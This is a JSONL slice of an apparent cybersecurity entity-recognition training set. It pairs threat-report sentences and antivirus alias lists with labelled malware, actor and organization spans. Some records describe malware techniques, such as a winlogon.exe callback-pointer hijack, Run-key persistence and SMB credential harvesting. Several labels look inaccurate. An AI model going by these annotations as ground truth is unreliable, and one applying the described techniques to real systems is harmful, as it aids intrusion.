{"text": "Several papers have been published about the group's operations, but until the Epic Turla research was published by Kaspersky Lab, little information was available about the more unusual aspects of their operations, such as the first stages of infection through watering-hole attacks.", "spans": {"THREAT_ACTOR: group's": [[45, 52]], "THREAT_ACTOR: Epic Turla": [[79, 89]], "ORGANIZATION: Kaspersky Lab,": [[116, 130]]}, "info": {"id": "cyner2_train_007042", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodfcc.Trojan.046a TrojanDownloader.Halocy Win32.Trojan.WisdomEyes.16070401.9500.9785 Trojan.Win32.Palibu.ekyevo Troj.Banker.W32.Palibu!c BehavesLike.Win32.Dropper.vh W32/Trojan.JGOQ-7647 TR/Spy.Banker.ysyj W32/Delf.BUL!tr.dldr TrojanDownloader:Win32/Halocy.B!bit Trojan/Win32.Banload.C1318047 Trojan.DL.Delf!CR51fUDm05E Trojan.Spy.Banker Trj/CI.A Win32/Trojan.ca7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007043", "source": "cyner2_train"}}
{"text": "In this post, we are going to explain how Dridex gain persistence in the system and how Dridex performs AtomBombing in detail.", "spans": {"MALWARE: Dridex": [[42, 48], [88, 94]], "SYSTEM: the system": [[69, 79]]}, "info": {"id": "cyner2_train_007044", "source": "cyner2_train"}}
{"text": "Two of these victims were under the protection of Managed Defense who identified and responded to the threat before significant impact occurred.", "spans": {"ORGANIZATION: Managed Defense": [[50, 65]], "MALWARE: the threat": [[98, 108]]}, "info": {"id": "cyner2_train_007047", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_SAMSA.H Win32.Trojan.WisdomEyes.16070401.9500.9936 W32/Trojan.XHGP-7520 Win32/SillyDl.GBZ TROJ_SAMSA.H Win.Trojan.Inject-46 Trojan.Win32.Samsa.rznk Trojan.Win32.A.Samsa.53248 Troj.W32.Samsa.e!c Backdoor:W32/Enfal.K BackDoor.Mask Trojan-Ransom.SamSam W32/Trojan.BDWY Trojan/PSW.Almat.vn TR/Enfal.F Trojan/Win32.Enfal Win32.Troj.Samsa.d.kcloud Trojan.Symmi.D100E7 Trojan:Win32/Samsa.A Trojan.Win32.Samsa.aw Trj/Qhost.ER Win32.Trojan.Invader.Duml W32/Samsa.H!tr Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007048", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Scar.dxkn Trojan.Win32.Scar.ecdkn Scar.HF TROJ_SCAR_000002b.TOMA Trojan.Win32.Scar.dxkn Trojan.Scar!44JrqMeLFEQ BackDoor.IRC.Bot.947 SPR/Tool.271360 TROJ_SCAR_000002b.TOMA Trojan/Scar.abjq Backdoor:Win32/ProxyBot.D Trojan/Win32.Scar Win32/CryptExe.A Trj/Scar.AL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007050", "source": "cyner2_train"}}
{"text": "In this blog, we will discuss how the TinyV Trojan spreads and how it works.", "spans": {}, "info": {"id": "cyner2_train_007052", "source": "cyner2_train"}}
{"text": "Akamai researchers on the Security Intelligence Response Team SIRT have discovered a new Go-based, DDoS-focused botnet.", "spans": {"ORGANIZATION: Akamai researchers": [[0, 18]], "ORGANIZATION: the Security Intelligence Response Team SIRT": [[22, 66]], "MALWARE: Go-based, DDoS-focused botnet.": [[89, 119]]}, "info": {"id": "cyner2_train_007053", "source": "cyner2_train"}}
{"text": "By analyzing Trigona ransomware binaries and ransom notes obtained from VirusTotal, as well as information from Unit 42 incident response, we determined that Trigona was very active during December 2022, with at least 15 potential victims being compromised.", "spans": {"MALWARE: Trigona ransomware": [[13, 31]], "ORGANIZATION: VirusTotal,": [[72, 83]], "ORGANIZATION: Unit 42": [[112, 119]], "MALWARE: Trigona": [[158, 165]], "ORGANIZATION: potential victims": [[221, 238]]}, "info": {"id": "cyner2_train_007054", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SayokaroiEA.Trojan Worm.Hilgild.A4 Troj.Banker.W32.Tinba.mAnM Trojan.Symmi.DB2FC W32.SillyFDC WORM_HILGIL.SMRP Trojan.Win32.Hesv.avgr Win32.Trojan.Hesv.Wwok TrojWare.Win32.Hilgild.AKO BackDoor.Nethief.310 WORM_HILGIL.SMRP Worm:Win32/Hilgild.A Trojan.Win32.Hesv.avgr Worm.Win32.Hilgild.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007055", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Deshacop.195072 Ransomware.ShinoLock.A3 Ransom.ShinoLocker.MSIL Trojan.Ransom.Shinolock.5 Ransom_SHINOLOCK.SMI0 Win32.Trojan.WisdomEyes.16070401.9500.9975 Ransom_SHINOLOCK.SMI0 Trojan.Win32.Ransom.195074 Trojan.DownLoader22.15733 Trojan.Win32.Filecoder Trojan.Deshacop.rk Ransom:MSIL/ShinoLock.A Trj/GdSda.A Trojan-Ransom.Win32.ShinoLocker.a Trojan.Deshacop!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007058", "source": "cyner2_train"}}
{"text": "The Dukes primarily target Western governments and related organizations, suchas government ministries and agencies, political think tanks, and governmental subcontractors.", "spans": {"THREAT_ACTOR: The Dukes": [[0, 9]], "ORGANIZATION: Western governments": [[27, 46]], "ORGANIZATION: organizations,": [[59, 73]], "ORGANIZATION: government ministries": [[81, 102]], "ORGANIZATION: agencies, political think tanks,": [[107, 139]], "ORGANIZATION: governmental subcontractors.": [[144, 172]]}, "info": {"id": "cyner2_train_007060", "source": "cyner2_train"}}
{"text": "Over the last few weeks, we collaborated with ClearSky and uncovered several indicators that were researched and found to be related to a new hacking campaign targeting large Vietnamese organisations.", "spans": {"ORGANIZATION: ClearSky": [[46, 54]], "THREAT_ACTOR: new hacking campaign": [[138, 158]], "ORGANIZATION: Vietnamese organisations.": [[175, 200]]}, "info": {"id": "cyner2_train_007062", "source": "cyner2_train"}}
{"text": "The critically acclaimed show focuses on a fictional group of political hacktivists, and follows a young cybersecurity engineer called Elliot Alderson who suffers from social anxiety disorder and forms connections through hacking.", "spans": {}, "info": {"id": "cyner2_train_007063", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Sartmob.r3 Trojan.StartPage!bEEY6Bd79s4 Trojan.Zbot Trojan.MSIL.StartPage.az Trojan.Win32.StartPage.cvohfz Trojan.StartPage.61440 W32/Trojan.CBVH-4150 Trojan/MSIL.bjlms.aigeayx Trojan/MSIL.StartPage Trojan:MSIL/Sartmob.A Trojan.MSIL.StartPage Trj/CI.A MSIL/StartPage.AD Msil.Trojan.Startpage.Efus Trojan.MSIL2 W32/StartPage.AZ!tr MSIL2.BIFV Trojan.MSIL.StartPage.az Win32/Trojan.Dropper.a9c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007065", "source": "cyner2_train"}}
{"text": "Before connecting with the socket , it creates a malware environment in ‘ APPDATA/myupd ’ and creates a sqlite3 database there – ‘ myupd_tmp\\\\mng.db ’ : CREATE TABLE MANAGE ( ID INT PRIMARY KEY NOT NULL , Send INT NOT NULL , Keylogg INT NOT NULL , Screenshot INT NOT NULL , Audio INT NOT NULL ) ; INSERT INTO MANAGE ( ID , Send , Keylogg , Screenshot , Audio ) VALUES ( 1 , 1 , 1 , 1 , 0 ) Finally , the malware modifies the ‘ Software\\Microsoft\\Windows\\CurrentVersion\\Run ’ registry key to enable autostart of the main module .", "spans": {}, "info": {"id": "cyner2_train_007068", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heuristic_Anomaly.A TROJ_TRACUR.SMVD Trojan:Win32/Chroject.D!dll Trojan.Win32.Kryptik.bCOPL Trojan.Win32.Crypt W32/Kryptik.COPL!tr Crypt3.BBGH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007069", "source": "cyner2_train"}}
{"text": "The Linux VENOM rootkit is a two-component malicious software aimed at maintaining unauthorized access on compromised Linux systems.", "spans": {"MALWARE: The Linux VENOM rootkit": [[0, 23]], "MALWARE: two-component malicious software": [[29, 61]], "SYSTEM: Linux systems.": [[118, 132]]}, "info": {"id": "cyner2_train_007070", "source": "cyner2_train"}}
{"text": "This report describes the latest iteration in a long-running espionage campaign against the Tibetan community.", "spans": {"THREAT_ACTOR: espionage campaign": [[61, 79]], "ORGANIZATION: Tibetan community.": [[92, 110]]}, "info": {"id": "cyner2_train_007071", "source": "cyner2_train"}}
{"text": "While we do not have detailed telemetry, we have reason to believe this attack targeted an individual at a public utilities company in the Middle East.", "spans": {"SYSTEM: telemetry,": [[30, 40]], "ORGANIZATION: individual": [[91, 101]], "ORGANIZATION: public utilities company": [[107, 131]]}, "info": {"id": "cyner2_train_007072", "source": "cyner2_train"}}
{"text": "It is also a keylogger and can take screenshots.", "spans": {}, "info": {"id": "cyner2_train_007073", "source": "cyner2_train"}}
{"text": "Tordow 2.0 can make telephone calls, control SMS messages, download and install programs, steal login credentials, access contacts, encrypt files, visit webpages, manipulate banking data, remove security software, reboot a device, rename files, and act as ransomware.", "spans": {"MALWARE: Tordow 2.0": [[0, 10]], "MALWARE: ransomware.": [[256, 267]]}, "info": {"id": "cyner2_train_007074", "source": "cyner2_train"}}
{"text": "The 3102 payload used in this attack also appears to be related to the Evilgrab payload delivered in the watering hole attack hosted on the President of Myanmar's website in May 2015.", "spans": {"MALWARE: The 3102 payload": [[0, 16]], "MALWARE: Evilgrab payload": [[71, 87]], "ORGANIZATION: the President of Myanmar's": [[136, 162]]}, "info": {"id": "cyner2_train_007076", "source": "cyner2_train"}}
{"text": "Since August 1, Palo Alto Networks WildFire has captured over 18,000 Android apps that contain this library.", "spans": {"ORGANIZATION: Palo Alto Networks": [[16, 34]], "SYSTEM: WildFire": [[35, 43]], "MALWARE: Android apps": [[69, 81]], "VULNERABILITY: library.": [[100, 108]]}, "info": {"id": "cyner2_train_007077", "source": "cyner2_train"}}
{"text": "APT-C-61 Tengyun Snake organization is an APT organization mainly active in South Asia.", "spans": {"THREAT_ACTOR: APT-C-61 Tengyun Snake organization": [[0, 35]], "THREAT_ACTOR: APT organization": [[42, 58]]}, "info": {"id": "cyner2_train_007079", "source": "cyner2_train"}}
{"text": "The attachment instead tries to download a template file over an SMB connection so that the user s credentials can be silently harvested.", "spans": {}, "info": {"id": "cyner2_train_007082", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Dokstormac Trojan.Downloader Trojan.Injector.Win32.137915 Trojan/Injector.upj Backdoor.Arcomrat TSPY_DOKSTORMAC_BK220249.TOMC Win.Trojan.7639863-1 Trojan.Win32.Pakes.vtl Trojan.Win32.Pakes.bbujhs BackDoor.Minirat TSPY_DOKSTORMAC_BK220249.TOMC BehavesLike.Win32.AdwareDealPly.fc BDS/Dokstormac.A.1 Backdoor:Win32/Dokstormac.A Trojan.Win32.Pakes.vtl Trojan/Win32.Pakes.R39576 Trojan-Injector.61205 Win32/Fynloski.AA Trojan.Injector!2nop4664l2U Backdoor.Win32.Dokstormac RAT.Arcom", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007083", "source": "cyner2_train"}}
{"text": "With access to business critical information, senior executives and consultants are often said to be valuable targets for threat actors tasked with obtaining sensitive business secrets.", "spans": {}, "info": {"id": "cyner2_train_007084", "source": "cyner2_train"}}
{"text": "Yoroi ZLab has discovered evidence of new campaign utilizing different tactics, including more complex delivery mechanisms and victimology, which began in April, 2022.", "spans": {"ORGANIZATION: Yoroi ZLab": [[0, 10]], "THREAT_ACTOR: campaign": [[42, 50]]}, "info": {"id": "cyner2_train_007086", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Unruy.5 Win32.Trojan.Kryptik.ak Trojan.ADH.2 Trojan.Win32.Crypted.bbxiyv Backdoor.Win32.A.Banito.73728.A Trojan.Scar.Win32.47454 BehavesLike.Win32.Downloader.fc Trojan-Downloader.Win32.Bulilit Trojan/Scar.ajgx Trojan:Win32/Tript.A Trojan/Win32.ADH.C261975 TScope.Malware-Cryptor.SB Win32.Trojan.Deepscan.Wnlw Trojan.DL.Unruy!ze+OfqNv7J8 Win32/Trojan.PSW.ea7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007087", "source": "cyner2_train"}}
{"text": "While still compromised, the ARC website also hosted an archive with the filename: the 3rd ASEAN Defence Ministers' Meeting.rar.", "spans": {"VULNERABILITY: compromised,": [[12, 24]]}, "info": {"id": "cyner2_train_007088", "source": "cyner2_train"}}
{"text": "AgentTesla is a fairly popular keylogger built using the Microsoft .NET Framework and has shown a substantial rise in usage over the past few months.", "spans": {"MALWARE: AgentTesla": [[0, 10]], "MALWARE: keylogger": [[31, 40]], "SYSTEM: the Microsoft .NET Framework": [[53, 81]]}, "info": {"id": "cyner2_train_007090", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.EliteWrap!O Trojan/Dropper.EliteWrap.103 Win32.Trojan.WisdomEyes.16070401.9500.9872 Win32/EliteWrap.103 Trojan-Dropper.Win32.EliteWrap.103 Trojan.Win32.EliteWrap.cstdvv TrojWare.Win32.EliteWrap.103 Trojan.MulDrop.19 Dropper.EliteWrap.Win32.6 Trojan-Dropper.Win32.EliteWrap TrojanDropper.Win32.EliteWrap.103 Trojan[Dropper]/Win32.EliteWrap Win32.Troj.ElitWrap.kcloud Trojan.Graftor.D934B Trojan-Dropper.Win32.EliteWrap.103 TrojanDropper:Win32/Elitewrap.A Trojan/Win32.HDC.C67537 TrojanDropper.EliteWrap Trojan.DR.EliteWrap!+qx1E/0nG5w W32/Multidr.E!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007091", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Qhost Trojan/KillProc.b Win.Trojan.4904185-1 Trojan.Inject.10975 Trojan.Win32.FakeAV TR/Qhost.DK.1 W32/Qhost.BE!tr Trojan:Win64/Qhost.DK Trj/CI.A Win32/Trojan.1ea", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007092", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Glomaru.10240 Trojan.Mauvaise.SL1 Trojan.Win32.Glomaru.a Trojan.Win32.FraudLoad.egvymu Troj.W32.Dialer.lwu8 Win32.Trojan.Glomaru.Wozz TrojWare.Win32.Glomaru.A Trojan.DownLoader23.35677 Trojan.Glomaru.a TR/FraudLoad.poenc Trojan.Zusy.D3521C Trojan.Win32.Glomaru.a Win32.Trojan.Small.P Trojan.Glomaru", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007095", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Small.43520.J Backdoor.Win32.PcClient!O Backdoor.Pcclient.19199 Backdoor.PcClient.Win32.16939 Trojan/PcClient.ngo Trojan.Tsaisda.1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win32/PcClient.BIJ Win.Trojan.PcClient-5088 Trojan.Win32.Pcclient.cqndw Backdoor.Win32.A.PcClient.43520 Backdoor.W32.Hupigon.kYKa TrojWare.Win32.PcClient.NOP BackDoor.PcClient.5363 Trojan.FraudPack Backdoor/PcClient.aesj W32.Tsaisda.A BDS/Pcclient.AL Trojan[Backdoor]/Win32.PcClient Backdoor:Win32/Tsaisda.A Trojan/Win32.PcClient.R25878 Backdoor.PcClient Backdoor.PcClient!ID9InYPBgAg W32/PcClient.GG!tr Win32/Backdoor.fa2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007096", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.8048 Win32.Nemim.A Win32.Trojan.WisdomEyes.16070401.9500.9999 HT_GARVEEP_FI060DBE.UVPM Win32.Nemim.A Win32.Pioneer.C Virus.Win32.Pioneer.e Win32.Nemim.A Win32.Nemim.A BehavesLike.Win32.Ramnit.th Virus.Win32.Nemim TR/Taranis.3944 TrojanDownloader:Win32/Garveep.D Win32.Nemim.A W32.Pioneer.mv7p Win32.Nemim.A Win32.Nemim.A Win32/Nemim.B Trojan.DownLoader! W32/Nemim.B Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007098", "source": "cyner2_train"}}
{"text": "Given what we ve seen previously with Vawtrak, simply switching to HTTPS is not a major update in terms of development -- but it does show that the threat actors are interested in protecting their C2 communications.", "spans": {"MALWARE: Vawtrak,": [[38, 46]], "THREAT_ACTOR: threat actors": [[148, 161]]}, "info": {"id": "cyner2_train_007099", "source": "cyner2_train"}}
{"text": "Most recently, we have observed the same group targeting military and aerospace interests in Russia and Belarus.", "spans": {"THREAT_ACTOR: the same group": [[32, 46]], "ORGANIZATION: military": [[57, 65]], "ORGANIZATION: aerospace": [[70, 79]]}, "info": {"id": "cyner2_train_007102", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Meciv Win32/Pucedoor.A Trojan.Enfal-11 Application.Win32.BlkIC.IMG Trojan.MulDrop1.40578 TR/Spy.174210 Trojan.Heur.E0B301 Backdoor:Win32/Meciv.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007103", "source": "cyner2_train"}}
{"text": "This current variant includes a link to the following payment onion website: http://zvnvp2rhe3ljwf2m[.]onion.", "spans": {}, "info": {"id": "cyner2_train_007104", "source": "cyner2_train"}}
{"text": "TV5Monde was taken off air in April 2015.", "spans": {"ORGANIZATION: TV5Monde": [[0, 8]]}, "info": {"id": "cyner2_train_007105", "source": "cyner2_train"}}
{"text": "Kaspersky Some time ago while tracking Winnti group activity we came across a suspicious 64-bit sample.", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: Winnti group": [[39, 51]]}, "info": {"id": "cyner2_train_007106", "source": "cyner2_train"}}
{"text": "The group discussed in this white paper is part of this new trend.", "spans": {}, "info": {"id": "cyner2_train_007108", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.3E85 Backdoor.Win32.Nepoe!O Dropper.Paradrop.Win32.108 W32/Korgo.worm PE_AGOBOT.AQM Win32.Trojan.WisdomEyes.16070401.9500.9889 W32/Bobax.AO W32.Bleshare PE_AGOBOT.AQM Win.Trojan.Poebot-45 Trojan-Dropper.Win32.Paradrop.a Trojan.Win32.Paradrop.xhlx Dropper.Paradrop.180736 Troj.Dropper.W32.Paradrop.kYTK TrojWare.Win32.TrojanDropper.Paradrop.a0 Trojan.MulDrop.2267 BehavesLike.Win32.Conficker.cc Backdoor.Win32.PoeBot.C W32/Bobax.LVYX-1108 TrojanDropper.Paradrop TR/Drop.Paradro.a.3 Trojan[Backdoor]/Win32.Agobot TrojanDropper:Win32/Paradrop.J Trojan-Dropper.Win32.Paradrop.a W32/Polybot.dr Backdoor.PoeBot Trj/Droppofonic.A Win32/TrojanDropper.Paradrop.A Worm.PoeBot.S W32/Paradrop.B!tr.dr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007109", "source": "cyner2_train"}}
{"text": "This blog will provide an analysis of the Bookworm Trojan and known indicators of compromise.", "spans": {"MALWARE: Bookworm Trojan": [[42, 57]]}, "info": {"id": "cyner2_train_007112", "source": "cyner2_train"}}
{"text": "Copy the stage 5 DLL into winlogon.exe Allocate a chunk of memory in winlogon.exe process and copy the same APC routine seen previously Read and save the original pointer of the __fnDWORD internal User32 routine ( located at offset +0x10 of the KernelCallbackTable ) and replace this pointer with the address of the APC stub routine After this function pointer hijacking , when winlogon.exe makes any graphical call ( GDI ) , the malicious code can execute without using CreateRemoteThread or similar triggers that are easily detectable .", "spans": {}, "info": {"id": "cyner2_train_007114", "source": "cyner2_train"}}
{"text": "SentinelLabs analyzed several iterations of AlienFox, a comprehensive toolset for harvesting credentials for multiple cloud service providers.", "spans": {"ORGANIZATION: SentinelLabs": [[0, 12]], "ORGANIZATION: AlienFox,": [[44, 53]], "MALWARE: toolset": [[70, 77]], "SYSTEM: cloud service providers.": [[118, 142]]}, "info": {"id": "cyner2_train_007115", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesLTPGOWF.Trojan Trojan/W32.Small.35840.NP Backdoor.Win32.Floder!O Backdoor/Floder.rlw Win32/Tnega.ANRP Backdoor.Win32.A.Floder.37376[UPX] Trojan.MulDrop1.37252 Backdoor/Floder.age Trojan[Backdoor]/Win32.Floder Backdoor:Win32/RDPopen.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007119", "source": "cyner2_train"}}
{"text": "The remaining 99 C C servers were duplicated configurations from different APKs. This is likely due to configuration files being hardcoded within the APK, and old spam campaigns infecting different users, thus, old configurations still being detected in the wild.", "spans": {"SYSTEM: APKs.": [[75, 80]], "SYSTEM: APK,": [[150, 154]], "THREAT_ACTOR: old spam campaigns": [[159, 177]], "ORGANIZATION: users,": [[198, 204]]}, "info": {"id": "cyner2_train_007120", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom_Ciluf.R002C0DL517 Win32.Trojan.WisdomEyes.16070401.9500.9967 Ransom_Ciluf.R002C0DL517 BehavesLike.Win32.Backdoor.ct W32/Trojan.QHYA-4995 Ransom:Win32/Ciluf.A Ransom.Lucifer Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007122", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Tiny.3072 Backdoor.Win32.Tiny!O Backdoor.Tiny BackDoor-IQ.b Troj.Dropper.W32.Small.l6P3 Backdoor/Tiny.c Win32.Trojan.WisdomEyes.16070401.9500.9646 Backdoor.Trojan BKDR_IQ.B Backdoor.Win32.Tiny.c Backdoor.Win32.Tiny.6144 BackDoor.Tiny.40 BKDR_IQ.B BackDoor-IQ.b Backdoor/Tiny.aw TR/Tiny.nmclh Trojan[Backdoor]/Win32.Tiny.c Trojan.Zusy.Elzob.804 Backdoor.Win32.Tiny.c Backdoor:Win32/Tiny.FBC Win-Trojan/IQ.B Backdoor.Win32.Small.Epi Bck/Tiny.B Win32.Backdoor.Tiny.Pcsz Backdoor.Win32.Tiny BDoor.IQ!tr.bdr Win32/Trojan.d37", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007123", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Nofear.C W32.W.Fearso.kYUv W32/Fearso.c Win32.Worm.Farex.a W32/Worm.AEST W32.Nofer.A@mm win32/Nofear.A Win.Worm.Fearso-2 Email-Worm.Win32.Fearso.c Trojan.Win32.Fearso.cssoyh I-Worm.Win32.A.Fearso.86541 Worm.Win32.Fearso.~BAAA Trojan.AVKill.9837 Worm.Fearso.Win32.9 BehavesLike.Win32.Nofear.mh Backdoor.Win32.Gobot W32/Worm.ENOQ-1581 I-Worm/Fearso.c Worm:Win32/Nofear.C@mm Worm[Email]/Win32.Fearso Worm:Win32/Nofear.C@mm Worm.Fearo Email-Worm.Win32.Fearso.c Worm.Fearso W32/Fearso.V.worm I-Worm.Farex.Y Win32/Farex.Y Trojan.Win32.Fearso.c I-Worm.Fearso!qiaAnheOcEc Worm.Win32.Nofear.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007124", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9925 Trojan.Win32.Yakes.vpge TR/Crypt.ZPACK.jrfyx Trojan:Win64/Carberp.A!bit Trojan.Win32.Yakes.vpge", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007125", "source": "cyner2_train"}}
{"text": "A worm that spreads by copying itself to file shares and removable drives.", "spans": {"MALWARE: worm": [[2, 6]], "SYSTEM: removable drives.": [[57, 74]]}, "info": {"id": "cyner2_train_007126", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9554 Trojan.Win32.Mlw.eugajo Trojan.Win32.Z.Firsot.3520512 W32/Trojan.KPJB-2397 Backdoor:MSIL/Firsot.A Trj/CI.A Backdoor.MSIL.Firsot Win32/Trojan.289", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007127", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kazy.D1D724 W32/Trojan.PVRS-3848 Trojan.Win32.PcClient.eptxte Trojan.Win32.Z.Pcclient.356864 BackDoor.PcClient.6543 Trojan.Reconyc.Win32.20285 BehavesLike.Win32.Dropper.fc Trojan.Win32.Krypt Trojan.Reconyc.gyp TR/Crypt.ZPACK.igurt Trojan[DDoS]/Win32.Macri TrojanDownloader:Win32/Redosdru.F!bit Trojan/Win32.Infostealer.R206663 TrojanDDoS.Macri Trj/CI.A W32/Kryptik.FQKI!tr Win32/Trojan.443", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007129", "source": "cyner2_train"}}
{"text": "One interesting new fact about Gaza cybergang activities is that they are actively sending malware files to IT Information Technology and IR Incident Response staff; this is also obvious from the file names they are sending to victims, which reflect the IT functions or IR tools used in cyber attack investigations.", "spans": {"THREAT_ACTOR: Gaza cybergang": [[31, 45]], "ORGANIZATION: IT Information Technology": [[108, 133]], "ORGANIZATION: IR Incident Response staff;": [[138, 165]]}, "info": {"id": "cyner2_train_007130", "source": "cyner2_train"}}
{"text": "Once delivered, Escelar has multiple installation stages where malware is downloaded using direct connections to multiple Microsoft SQL servers.", "spans": {"MALWARE: Escelar": [[16, 23]], "MALWARE: malware": [[63, 70]], "SYSTEM: multiple Microsoft SQL servers.": [[113, 144]]}, "info": {"id": "cyner2_train_007131", "source": "cyner2_train"}}
{"text": "However, unlike Dyre which was designed to target banking information, Rombertik collects information from all websites in an indiscriminate manner.", "spans": {"MALWARE: Dyre": [[16, 20]], "ORGANIZATION: banking information,": [[50, 70]], "MALWARE: Rombertik": [[71, 80]]}, "info": {"id": "cyner2_train_007132", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.DP.E18DA6 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.W.Dorifel.moev TrojWare.Win32.Delf.OSP1 Trojan.DownLoad1.16614 Trojan-Downloader.Win32.Rochap TR/Dldr.Rochap.J Trojan/Win32.Unknown TrojanDropper:Win32/Rochap.H Win32/Delf.OSP W32/Dropper.VFR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007133", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig!O Downloader.Small.28090 Trojan/Downloader.Harnig.al Win32.Trojan.WisdomEyes.16070401.9500.9939 Downloader.Trojan Win.Downloader.Small-579 Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig.al Trojan.Downloader.Harnig.al Trojan.Win32.Harnig.voqq Trojan.Win32.A.Downloader.10240.FS Troj.Downloader.W32.Harnig.al!c Trojan.Downloader.Harnig.al TrojWare.Win32.TrojanDownloader.Harnig.AL Trojan.Downloader.Harnig.al Trojan.DownLoader.919 Downloader.Harnig.Win32.353 BehavesLike.Win32.Cutwail.lt Trojan-Downloader.Win32.Harnig Trojan/Startpage.nv W32.Trojan.Downloader.Harnig Trojan[Downloader]/Win32.Harnig Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig.al Trojan/Win32.Downloader.R39433 Trojan.Downloader.Harnig.al OScope.Downloader.GCLA Trj/Harnig.AD Win32/TrojanDownloader.Harnig.AL Win32.Trojan-downloader.Harnig.Sxyp Trojan.QHost.L W32/Harnig.AI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007134", "source": "cyner2_train"}}
{"text": "This campaign involved five separate phishing attacks, each carrying a different variant of Sysget malware, also known as HelloBridge.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "MALWARE: Sysget malware,": [[92, 107]], "MALWARE: HelloBridge.": [[122, 134]]}, "info": {"id": "cyner2_train_007135", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SkipnetA.Trojan Trojan.VB W32/Bybz.ehk Trojan.IPZ.3 Win32.Trojan.WisdomEyes.16070401.9500.9995 TROJ_VB_GA2509B6.UVPM Win.Trojan.Injector-397 Trojan.Win32.AutoRun.thcnx Worm.Win32.AutoRun.dck Trojan.MulDrop2.2467 Worm.Bybz.Win32.935 TROJ_VB_GA2509B6.UVPM BehavesLike.Win32.VBobfus.dc Trojan/Cosmu.gzo W32/Llac.PMC!tr Worm/Win32.Bybz Worm.Win32.A.AutoRun.206367 Worm/Win32.AutoRun.C11891 PWS-Spyeye.ai OScope.Worm.Bybz.31321 Worm.Bybz!gMC6zzOscGs Backdoor.Win32.Poison", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007136", "source": "cyner2_train"}}
{"text": "These tools included utilities from Microsoft Sysinternals and parts of open-source projects.", "spans": {"MALWARE: tools": [[6, 11]], "SYSTEM: Microsoft Sysinternals": [[36, 58]], "SYSTEM: open-source projects.": [[72, 93]]}, "info": {"id": "cyner2_train_007137", "source": "cyner2_train"}}
